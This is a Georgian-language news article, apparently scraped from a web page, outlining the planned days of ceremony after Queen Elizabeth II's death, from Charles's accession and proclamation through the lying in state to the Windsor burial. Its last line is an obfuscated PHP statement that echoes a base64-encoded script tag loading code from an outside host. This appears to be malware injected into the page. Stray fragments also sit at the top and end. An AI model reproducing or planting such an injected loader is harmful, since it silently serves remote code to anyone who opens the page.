celsiusi
ავერსი საქკაბელი
დედოფალი ელისაბედ მეორეს გარდაცვალების შემდეგ, გაერთიანებული სამეფოს ტახტს პრინცი ჩარლზი დაიკავებს.
 
მონარქის დაკრძალვის ისტორიული ტრადიცია კი ასეთია: 
 
ტრადიციისამებრ, ბუკინგემის სასახლის კარიბჭეზე მიამაგრებენ ცნობას მონარქის გარდაცვალების შესახებ. Politico-ს ინფორმაციით, სამეფო ოჯახის ვებგვერდზე შავ ფონზე იგივე შეტყობინება გამოჩნდება.
 
პირველი ოფიციალური პირი, ვინც განცხადებას გააკეთებს, პრემიერ–მინისტრი იქნება, რომელიც მოგვიანებით ახალ მონარქს შეხვდება.
 
პრინცი ჩარლზი კი იმავე საღამოს საჯარო განცხადებით გამოვა. დედოფლის გარდაცვალებისთანავე პრინცი ჩარლზი მეფე ხდება. მისი კორონაცია შესაძლოა რამდენიმე თვეში ან ერთ წელში გაიმართოს.
 
მოსახლეობისადმი მიმართვის შემდეგ ჩატარდება წირვა წმინდა პავლეს საკათედრო ტაძარში, რომელსაც დაესწრება პრემიერ–მინისტრი.
 
მეორე დღეს, დილის ათ საათზე სპეციალური საბჭო, რომლის წევრებიც მაღალჩინოსნები არიან, სენტ ჯეიმსში შეიკრიბებიან, რათა მეფე ჩარლზი ახალ სუვერენად გამოაცხადონ.
 
ბრიტანეთის პარლამენტი სამძიმრის წერილის შესათანხმებლად შეიკრიბება. საკანონმდებლო ორგანოს მუშაობა ათი დღით შეჩერდება. ორ დღეში დედოფლის ცხედარს ბუკინგემის სასახლის ტახტის ოთახში დაასვენებენ.
 
მესამე დღეს მეფე ჩარლზი ვესტმისტერ ჰოლში სამძიმრის წერილებს მიიღებს. დღის მეორე ნახევარში კი გაერთიანებული სამეფოს გარშემო ტურნეში გაემგზავრება, რომელიც შოტლანდიის პარლამენტში ვიზიტით დაიწყება.
 
მეოთხე დღეს მეფე ჩარლზი ჩავა ჩრდილოეთ ირლანდიაში, სადაც ჰილსბოროს სასახლეში სამძიმარს მიიღებს და ბელფასტში მსახურებას დაესწრება.
 
ამავე დღეს დედოფლის ცხედრის გადასვენება მოხდება ბაკინგემის სასახლიდან უესტმისტერის სასახლეში.
 
მეხუთე დღეს ლონდონის გავლით მონარქს ბაკინგემის სასახლიდან უიესტმისტერის სასახლეში გადაასვენებენ, სადაც მსახურება ჩატარდება.
 
უესტმისტერის სასახლეში დედოფალი სამი დღის განმავლობაში იქნება დასვენებული, უესტმისტერ ჰოლი პუბლიკისთვის 23 საათის განმავლობაში იქნება ღია. ამავე პერიოდში მეფე ჩარლზი გაემგზავრება უელსში, სადაც ასევე სამძიმარს მიიღებს და კარდიფში მსახურებას დაესწრება.
 
ამ ხნის განმავლობაში, სამთავრობო უწყებები დაკრძალვის დაგეგმვით იქნებიან დაკავებულნი. გასათვალისწინებელი იქნება სატრანსპორტო მიმოსვლა, უცხო ქვეყნის ლიდერების ჩამოსვლა, უსაფრთხოების საკითხები და ა.შ.
 
დაკრძალვის დღე ოფიციალურად გამოცხადდება გლოვის დღედ.
 
უშუალოდ დაკრძალვა უესტმისტერის სააბატოში გაიმართება. შუადღით მთელი ქვეყნის მასშტაბით ორწუთიანი დუმილი გამოცხადდება.
 
პროცესია ჩაივლის ლონდონსა და უინძორში. მსახურება უინძორის სასახლეში წმინდა ჯორჯის ტაძარში გაიმართება და დედოფალი მამისა და ქმრის, გვერდით დაიკრძალება.
649
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");